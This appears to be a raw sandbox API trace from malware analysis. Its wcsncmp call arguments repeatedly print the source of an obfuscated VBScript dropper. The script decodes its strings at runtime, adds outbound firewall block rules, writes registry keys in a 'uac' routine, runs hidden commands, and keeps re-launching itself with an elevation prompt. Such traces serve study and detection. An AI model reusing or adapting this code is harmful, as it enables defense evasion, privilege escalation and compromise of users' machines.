bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 106 [0223.023] wcsncmp (_String1="(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0223.023] wcsncmp (_String1="\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 21 [0223.023] wcsncmp (_String1="BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 53 [0223.023] wcsncmp (_String1="FAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 57 [0223.023] wcsncmp (_String1="AEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = 